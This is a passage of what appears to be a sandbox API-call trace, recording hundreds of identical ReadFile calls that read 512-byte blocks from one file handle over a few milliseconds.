nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, 
lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.087] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.088] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.088] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: 
lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.088] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.088] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.088] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.088] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.088] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.088] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.088] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.088] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.088] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, 
lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.089] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.090] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.090] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.090] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.090] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.090] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.090] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.090] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.090] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.090] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.090] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.090] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, 
lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.091] ReadFile 
(in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.092] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.092] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.092] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.092] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.092] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.092] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.092] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.092] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 
[0195.092] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.092] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.092] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.093] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.093] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.093] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.093] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.093] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.093] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, 
lpOverlapped=0x0) returned 1 [0195.093] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.093] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.093] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.094] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.094] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.094] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.094] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.095] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.095] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, 
lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.095] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.095] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.095] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.095] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.095] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.095] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.095] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.095] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.096] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: 
lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.096] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.096] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.096] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.096] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.096] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, 